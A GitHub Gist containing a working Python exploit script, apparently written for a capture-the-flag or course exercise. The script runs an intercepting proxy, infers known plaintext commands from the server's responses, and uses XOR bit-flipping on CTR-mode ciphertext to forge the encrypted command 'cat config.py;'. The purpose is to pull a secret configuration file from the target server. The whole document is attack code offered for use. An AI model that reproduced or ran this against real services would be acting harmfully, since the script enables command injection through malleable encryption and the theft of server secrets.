Created
April 6, 2019 15:17
-
-
Save arselzer/4c68de18776d66a351f95946589a614c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import subprocess | |
import shlex | |
import os | |
import threading | |
import socket | |
import sys | |
import re | |
import base64 | |
from Crypto.Util.Padding import pad, unpad | |
from Crypto.Cipher import AES | |
from Crypto.Util.strxor import strxor | |
#from Crypto.Util.Padding import pad, unpad | |
BLOCK_SIZE = 16 | |
CTR_SIZE = 4 | |
cmds = [ "exec date -d @1267619929", | |
"exec df -Tha --total", | |
"exec du -ach | sort -h", | |
"exec ps aux | grep -v grep | grep -i -e VSZ -e bash", | |
"exec mount | column -t" | |
] | |
matchers = [ | |
'\d\d:\d\d:\d\d UTC \d\d\d\d', | |
'Filesystem\s+Type\s+Size', | |
'\dK\s+\./', | |
'ps: not found', | |
'column: not found' | |
] | |
buffer_size = 4096 | |
server_addr = "0.0.0.0" | |
server_port = 31337 | |
proxy_port = 31337 | |
evil_cmd = "cat config.py;" | |
def write_secret(secret): | |
with open('secret.txt', 'w+') as secret_file: | |
secret_file.write(secret) | |
def steal_secret(plaintext, ciphertext): | |
#print(plaintext) | |
iv = ciphertext[:BLOCK_SIZE] | |
mac = ciphertext[-BLOCK_SIZE:] | |
data = ciphertext[BLOCK_SIZE:-BLOCK_SIZE] | |
#print (iv, mac, data) | |
evil_cmd_with_spaces = evil_cmd + ('\0' * (len(plaintext) - len(evil_cmd))) | |
# XOR the ciphertext with the new command | |
# C_1 = P xor K => K = C_1 xor P | |
# => C_2 = P_2 xor K = P_2 xor C_1 xor P | |
#print(len(plaintext), len(evil_cmd_with_spaces)) | |
xor1 = strxor(plaintext, evil_cmd_with_spaces.encode()) | |
#print(len(data), len(xor1)) | |
new_data = strxor(xor1, data) | |
print(data) | |
print(new_data) | |
#new_iv = strxor(iv, strxor(data[-BLOCK_SIZE:], new_data[-BLOCK_SIZE:])) | |
msg = base64.b64encode(iv + new_data + mac) + b'\n' | |
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
server_socket.settimeout(1) | |
server_socket.connect((server_addr, server_port)) | |
server_socket.send(msg) | |
server_resp = "" | |
while True: | |
try: | |
server_data = server_socket.recv(1024) | |
if not server_data: | |
break | |
server_resp += server_data.decode("utf-8") | |
except socket.timeout: | |
break | |
print(server_resp) | |
def attack_thread(ciphertext, server_resp): | |
#print ("attack thread started " + ciphertext + " " + server_resp) | |
for i, r in enumerate(matchers): | |
if re.search(r, server_resp): | |
plaintext = cmds[i] | |
#print("plaintext: " + plaintext + " ciphertext: " + ciphertext) | |
steal_secret(plaintext.encode(), base64.b64decode(ciphertext)) | |
break | |
def proxy_thread(client_conn, addr): | |
#print("Proxy thread started") | |
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
server_socket.settimeout(1) | |
server_socket.connect((server_addr, server_port)) | |
while True: | |
try: | |
client_data = client_conn.recv(1024) | |
if not client_data: | |
break; | |
server_socket.send(client_data) | |
#print ("data: " + client_data.decode("utf-8")) | |
server_resp = "" | |
while True: | |
try: | |
server_data = server_socket.recv(1024) | |
if not server_data: | |
break | |
server_resp += server_data.decode("utf-8") | |
client_conn.send(server_data) | |
#print ("forwarding: " + server_data.decode("utf-8") ) | |
except socket.timeout: | |
break | |
threading.Thread(target=attack_thread, args=(client_data.decode("utf-8"), server_resp)).start() | |
except socket.timeout: | |
break | |
server_socket.close() | |
client_conn.close() | |
if __name__ == "__main__": | |
server_addr = os.environ["CCMSERVER"] | |
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
#proxy_socket.setblocking(0) | |
proxy_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) | |
proxy_socket.bind(('', proxy_port)) | |
try: | |
proxy_socket.listen() | |
except: | |
print("Error creating socket") | |
sys.exit(1) | |
while True: | |
try: | |
conn, addr = proxy_socket.accept() | |
conn.settimeout(1) | |
threading.Thread(target=proxy_thread, args=(conn, addr)).start() | |
except: | |
proxy_socket.close() | |
print("Socket accept error") | |
sys.exit(1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment